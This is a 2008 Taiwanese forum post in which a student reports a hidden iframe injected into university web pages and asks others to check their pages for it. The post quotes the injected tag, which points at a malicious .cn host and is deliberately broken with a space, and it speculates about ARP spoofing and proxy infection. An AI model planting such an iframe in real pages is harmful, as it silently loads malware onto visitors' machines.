[問題] 中毒?木馬?請大家幫忙找看看
※ [本文轉錄自 MUSTMIS 看板]
作者: yck0210 (我的心不再流浪) 看板: MUSTMIS
標題: [問題] 中毒?木馬?請大家幫忙找看看
時間: Wed Oct 22 19:59:40 2008
在我們系上網最近會發現學校許多Server都被掛上大陸網站隱藏語法....
我先聲明,我不站在哪個單位,也不喜歡把技術問題給政治化!
我只是想找到問題,知道問題的根源,最重要的是讓大家有一個安全無虞的網路環境~
所以,如果大家也發現跟我一樣有下列的問題,請回應給我!
告訴我您在哪上網的?您是瀏覽哪一個網頁才發現的?
最近學校有些網站會隱藏一些會導入病毒網站的語法....
這個語法會導致看這網頁的同時也導入到這大陸網站!
至於下載什麼東西我們還不清楚,防毒軟體掃瞄本機也沒有病毒~
但是有些網站會看不到內容,狀況畫面如下列二張圖片....
http://img80.imageshack.us/my.php?image=gggggttt1lf5.jpg
在這些疑似被入侵的網站內,打開網頁的原始碼的第一行會出現下列語法....
<iframe src=http ://gggggttt.cn/1/zz.htm width=100 height=0></iframe>
^^^^^^^^^^^^^^^^^^^^^^^^^^^^ => 網站故意加空格,怕有人誤連!
進這些網站沒什麼問題,但有的網頁就會打不開,用防毒軟體掃也掃不到!
今天我在網路上survey這個問題,發現台灣地區好像沒人反應,都是大陸在討論~
我整理了一下,發現它的特性,好像是一種ARP攻擊,會造成整個區域網路都中獎!
Norton 網站所公告關於 gggggttt.cn 的說明
http://safeweb.norton.com/report/show?name=gggggttt.cn
原本我的想法如下列所述....
很多人都知道這個問題,都掃毒了也沒發現病毒,計中說網頁也沒被竄改!
在學校上網只要是連80 port會經過proxy server,
也就是一般http網頁都會經過代理伺服器~
如果從校外連進學校就不會經過proxy server,也很正常,所以我懷疑是proxy中毒!
可是有趣的是,只有特定網站才會有這個現象,有的網站就不會有~
網路上有討論說Client端跟Server端都沒問題,病毒是存在Server的記憶體裡,
所以Server重開機就不會有這問題!
但是問題還是沒解決,它有可能藏在SQL Server裡面,一被執行又發作了~
計中說是我們資工系都中毒才會這樣,這句話讓我們系上的老師都很不爽!
我曾經想過會不會是路由器被攻擊,不過路由器只處理到網路的第三層,
所以應該是不太可能~
系上太多電腦了,我光測我的實驗室就快吐了,有的電腦有這現象,有的沒有....
所以,結論是,有看到這篇文章的朋友們幫我測一下,任何校內或校外的網頁都可以!
看看會不會有這問題,在原始碼內的第一行會不會有那一行語法?
如果有請告訴我,告訴我您在哪上網,看哪一個網頁?
謝謝大家的幫忙!
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 210.240.221.175
推
10/22 21:37,
10/22 21:37
→
10/22 21:57,
10/22 21:57
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 211.74.172.225
推
10/23 00:42, , 1F
10/23 00:42, 1F